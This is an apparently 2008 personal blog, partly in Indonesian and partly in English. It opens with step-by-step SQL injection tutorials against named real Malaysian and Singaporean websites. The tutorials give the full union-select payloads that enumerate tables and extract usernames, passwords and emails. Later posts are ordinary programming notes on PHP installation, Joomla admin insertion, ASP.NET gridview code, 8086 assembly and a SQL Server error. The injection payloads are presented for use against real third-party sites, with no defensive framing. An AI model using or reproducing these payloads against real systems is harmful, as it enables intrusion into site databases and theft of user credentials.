Web target sudah di patch......
Terima Kasih
============================================================
Tool :
1. Mozilla, IE
2. Komputer yang konek ke internet
Perlengkapan laen (gak wajib) :1. Secangkir kopi
2. Foto cewek cakep di samping komputer...
3. Keuletan....
1. Cari target
Contoh targer:contoh: http://taseen.com.my/news/news.php?id=3
2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://taseen.com.my/news/news.php?id=3'
Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe
3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah = silahkan tambahkan -
jadi urlnya:contoh: http://taseen.com.my/news/news.php?id=-3
Sekarang silahkan kasi order ampe ketemu error....
Contoh:
http://taseen.com.my/news/news.php?id=3 order by 1/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 2/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 3/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 4/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 5/* <---- ada eror bahwa web tersebut punya 4 colom....
4 Sekarang masukkan perintah unoin all select 1,2,3,4/* <<<--- serupakan colom yang ada dallam web tersebut contoh: http://taseen.com.my/news/news.php?id=-3 union all select 1,2,3,4/*
Maka akan keluar angka , misal angka yang keluar adalah 3 ,Angka yang keluar pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version untuk mengecek versi
5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d, user_is, username, password, pass dll
Sekarang kita coba username
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,username,4 from users/* jreng jreng...... usernya keliatan.......
Sekarang coba passwordnya.....
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,password,4 from users/* jreng jreng..... passwordnya keliatan juga....
Sekarang kta coba dua duanya
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,concat(username,0x3a,password,0x3a,email),4 from users/*
jreng jreng.... user n passwordnya keliatan.... Selesei deh...... dah dulu ya... mau belajar dulu... maklum masih smp...kwkwkwkw...
Wednesday, December 03, 2008
SQL Injection singapura website edition
Ketemu lagi dengan saya...... hehehe masih tetep sql injection......... tapi targetnya beda coy bukan malay tapi sg........................... kpan kapan .au .us .go.id hehehehe
Kayak biasanya:
1. Cari target
Contoh targer:contoh: http://www.pdscientific.com.sg/source/news.php?id=1
2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://www.pdscientific.com.sg/source/news.php?id=1'
Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe
3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah = silahkan tambahkan -
jadi urlnya:contoh: http://www.pdscientific.com.sg/source/news.php?id=1
Sekarang silahkan kasi order ampe ketemu error....
Contoh:
http://www.pdscientific.com.sg/source/news.php?id=1 order by 1/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 2/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 3/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 4/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 5/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 6/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 7/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 8/* <---- ada error
Maka tersebut punya 7 colom....
4 Sekarang masukkan perintah unoin all select 1,2,3,4,5,6,7/* <<<--- serupakan colom yang ada dallam web tersebut
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,2,3,4,5,6,7/*
Maka akan keluar angka , misal angka yang keluar adalah 2 ,Angka yang keluar pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version untuk mengecek versi
5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d, user_is, username, password, pass dll
6. Kita coba liat liat tabel yang ada
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables/*
7. Kita coba liat juga kolom2 nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns/*
Udah puas liat liat ???? Terserah deh di apain
8. Sekarang kita coba berburu username
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_name,3,4,5,6,7 from users/*
9.Sekarang coba berburu passwordnya.....
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_pwd,3,4,5,6,7 from users/*
10.Sekarang kita coba berburu user_id nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_id,3,4,5,6,7%20from%20users/*
11.Sekarang kita coba berburu login_namenya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_login,3,4,5,6,7%20from%20users/*
12. Sekarang kita coba semuanya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,concat(user_id,0x3a,user_login,0x3a,user_pwd,0x3a,user_name),3,4,5,6,7%20from%20users/*
Wah udah komplit nie..... skarang tinggal kreatifitas kamu aja............'
Kayak biasanya:
1. Cari target
Contoh targer:contoh: http://www.pdscientific.com.sg/source/news.php?id=1
2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://www.pdscientific.com.sg/source/news.php?id=1'
Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe
3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah = silahkan tambahkan -
jadi urlnya:contoh: http://www.pdscientific.com.sg/source/news.php?id=1
Sekarang silahkan kasi order ampe ketemu error....
Contoh:
http://www.pdscientific.com.sg/source/news.php?id=1 order by 1/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 2/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 3/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 4/* <---- gak ada eror
http://www.pdscientific.com.sg/source/news.php?id=1 order by 5/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 6/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 7/* <---- gak ada error
http://www.pdscientific.com.sg/source/news.php?id=1 order by 8/* <---- ada error
Maka tersebut punya 7 colom....
4 Sekarang masukkan perintah unoin all select 1,2,3,4,5,6,7/* <<<--- serupakan colom yang ada dallam web tersebut
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,2,3,4,5,6,7/*
Maka akan keluar angka , misal angka yang keluar adalah 2 ,Angka yang keluar pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version untuk mengecek versi
5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d, user_is, username, password, pass dll
6. Kita coba liat liat tabel yang ada
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables/*
7. Kita coba liat juga kolom2 nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns/*
Udah puas liat liat ???? Terserah deh di apain
8. Sekarang kita coba berburu username
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_name,3,4,5,6,7 from users/*
9.Sekarang coba berburu passwordnya.....
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_pwd,3,4,5,6,7 from users/*
10.Sekarang kita coba berburu user_id nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_id,3,4,5,6,7%20from%20users/*
11.Sekarang kita coba berburu login_namenya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_login,3,4,5,6,7%20from%20users/*
12. Sekarang kita coba semuanya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,concat(user_id,0x3a,user_login,0x3a,user_pwd,0x3a,user_name),3,4,5,6,7%20from%20users/*
Wah udah komplit nie..... skarang tinggal kreatifitas kamu aja............'
Thursday, November 27, 2008
php ajax
huh just complete my ajax code..its long codes compared with dotnet that i just need postback page.i need to understand the method passing the string...just refer to www3scol and build the code back,.,i try repeatly the program and see the response from 127.0.0.1 very late..duh better use postback in dotnet.ngonggggg
Wednesday, September 10, 2008
Linux package installation or php upgrade howto
Installing PHP is easy these days.
Red Hat enterprise Linux PHP installation
If you would like to install or upgrade PHP use up2date command:
# up2date php
CentOS/Fedora core Linux PHP installation
If you would like to install PHP use yum command
# yum install php
If you would like to upgrade PHP use yum command
# yum update php
Debian / Ubentu Linux PHP installation
If you would like to install or upgrade PHP use atp-get command
# apt-get install php4-cgi php4-cli
# sudo apt-get install php4-cgi php4-cli
To install PHP 5
# apt-get install php5-cgi php5-cli
# sudo apt-get install php5-cgi php5-cli
FreeBSD PHP installation
Use pkg_add command as follows:
# pkg_add -v -r php
Use above command to install Apache or Lighttpd web server.
u also can use yum search (word) too
Red Hat enterprise Linux PHP installation
If you would like to install or upgrade PHP use up2date command:
# up2date php
CentOS/Fedora core Linux PHP installation
If you would like to install PHP use yum command
# yum install php
If you would like to upgrade PHP use yum command
# yum update php
Debian / Ubentu Linux PHP installation
If you would like to install or upgrade PHP use atp-get command
# apt-get install php4-cgi php4-cli
# sudo apt-get install php4-cgi php4-cli
To install PHP 5
# apt-get install php5-cgi php5-cli
# sudo apt-get install php5-cgi php5-cli
FreeBSD PHP installation
Use pkg_add command as follows:
# pkg_add -v -r php
Use above command to install Apache or Lighttpd web server.
u also can use yum search (word) too
Thursday, August 21, 2008
how do I manually add an administrator user for joomla?
huhu backup ur db first b4 do this.....
all this related 3 table to insert operation....
INSERT INTO `jos_users` VALUES
(62, 'Administrator', 'admin', ' your-email@email.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ', '21232f297a57a5a743894a0e4a801fc3', 'Super Administrator', 0, 1, 25, '2005-09-28 00:00:00', '2005-09-28 00:00:00', '', '');
INSERT INTO `jos_core_acl_aro` VALUES (10,'users','62',0,'Administrator',0);
INSERT INTO `jos_core_acl_groups_aro_map` VALUES (25,'',10);
Note the extra two tables. If you are not sure what you are doing, please take care. This is directly editing the database
all this related 3 table to insert operation....
INSERT INTO `jos_users` VALUES
(62, 'Administrator', 'admin', ' your-email@email.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ', '21232f297a57a5a743894a0e4a801fc3', 'Super Administrator', 0, 1, 25, '2005-09-28 00:00:00', '2005-09-28 00:00:00', '', '');
INSERT INTO `jos_core_acl_aro` VALUES (10,'users','62',0,'Administrator',0);
INSERT INTO `jos_core_acl_groups_aro_map` VALUES (25,'',10);
Note the extra two tables. If you are not sure what you are doing, please take care. This is directly editing the database
Saturday, May 17, 2008
gridview checkbox or any hidden template
damn got this task about two week ago..while got another offer from gov.Huhuh today 17 mei 08 just complete this code less than 10 minutes..hahahha...so here i wanna keep this code myb this code can help some one..this code is to read an id from gridview and do anything crud.. i just modify this code to get my hidden templates..alhamdullilah its work
here
Dim taskID As Integer = 0
'Dim task As Task = New Task()
'Dim row As GridViewRow
'For Each row In GridView2.Rows
'Dim result As Boolean = (CType(row.FindControl("chkSelect"), CheckBox)).Checked
'If (result) Then
taskID = Convert.ToInt32((CType(GridView2.SelectedRow.FindControl("lblTaskID"), Label)).Text)
MsgBox(taskID)
'task.UpdateTask(taskID)
'End If
'Next
my reference from azam #..his web very good reference and many time help me :p.
int taskID = 0;
Task task = new Task();
foreach (GridViewRow row in gvInComplete.Rows)
{
bool result = ((CheckBox) row.FindControl("chkSelect")).Checked;
if (result)
{
taskID = Convert.ToInt32(((Label)row.FindControl("lblTaskID")).Text);
task.UpdateTask(taskID);
}
}
here
Dim taskID As Integer = 0
'Dim task As Task = New Task()
'Dim row As GridViewRow
'For Each row In GridView2.Rows
'Dim result As Boolean = (CType(row.FindControl("chkSelect"), CheckBox)).Checked
'If (result) Then
taskID = Convert.ToInt32((CType(GridView2.SelectedRow.FindControl("lblTaskID"), Label)).Text)
MsgBox(taskID)
'task.UpdateTask(taskID)
'End If
'Next
my reference from azam #..his web very good reference and many time help me :p.
int taskID = 0;
Task task = new Task();
foreach (GridViewRow row in gvInComplete.Rows)
{
bool result = ((CheckBox) row.FindControl("chkSelect")).Checked;
if (result)
{
taskID = Convert.ToInt32(((Label)row.FindControl("lblTaskID")).Text);
task.UpdateTask(taskID);
}
}
Sunday, April 20, 2008
check html tool in gridview
this code might help someone a simple solution huh
Dim selectedvalue As String = Request.Form("myCheckbox")
here
Dim selectedvalue As String = Request.Form("myCheckbox")
here
8086 assembler tutorial
Duhh ive exam this wednesday! tonight i must upload the tutoriol that need to submit tonight..ive study a code that i dont understand in class since i always talking with my frend at back lol...im looking the means of jmp, jne, duhh what the heck is this..lol its is same as if = , <>
The logic is very simple, for example:
it's required to compare 5 and 2,
5 - 2 = 3
the result is not zero (Zero Flag is set to 0).
Another example:
it's required to compare 7 and 7,
7 - 7 = 0
the result is zero! (Zero Flag is set to 1 and JZ or JE will do the jump).
i want to keep this things in my note huhuhu!!and share for all...
pray for me to do this exam ahaks this wednesday:P
The logic is very simple, for example:
it's required to compare 5 and 2,
5 - 2 = 3
the result is not zero (Zero Flag is set to 0).
Another example:
it's required to compare 7 and 7,
7 - 7 = 0
the result is zero! (Zero Flag is set to 1 and JZ or JE will do the jump).
i want to keep this things in my note huhuhu!!and share for all...
pray for me to do this exam ahaks this wednesday:P
Wednesday, April 09, 2008
SQL SERVER EXPRESS 2005 The operating system returned the error '5(Access is denied.)'
System.Data.SqlClient.SqlError: The operating system returned the error '5(Access is denied.)' while attempting 'RestoreContainer::ValidateTargetForCreation' on 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\TEST.MDF'. (Microsoft.SqlServer.Express.Smo)
1)give a different location to save the mdf and ldf file!
2)C:\Program Files\Microsoft SQL Server\MSSQL.1
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data
For my SQL User Accounts on my machine to allow them to write the MDF and LDF Files to those locations.
3)My solution goto configuration tool-sql server configuration manager-sqlserver2005services-properties
change network sevices to local system
HTH someone
1)give a different location to save the mdf and ldf file!
2)C:\Program Files\Microsoft SQL Server\MSSQL.1
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data
For my SQL User Accounts on my machine to allow them to write the MDF and LDF Files to those locations.
3)My solution goto configuration tool-sql server configuration manager-sqlserver2005services-properties
change network sevices to local system
HTH someone
Subscribe to:
Posts (Atom)
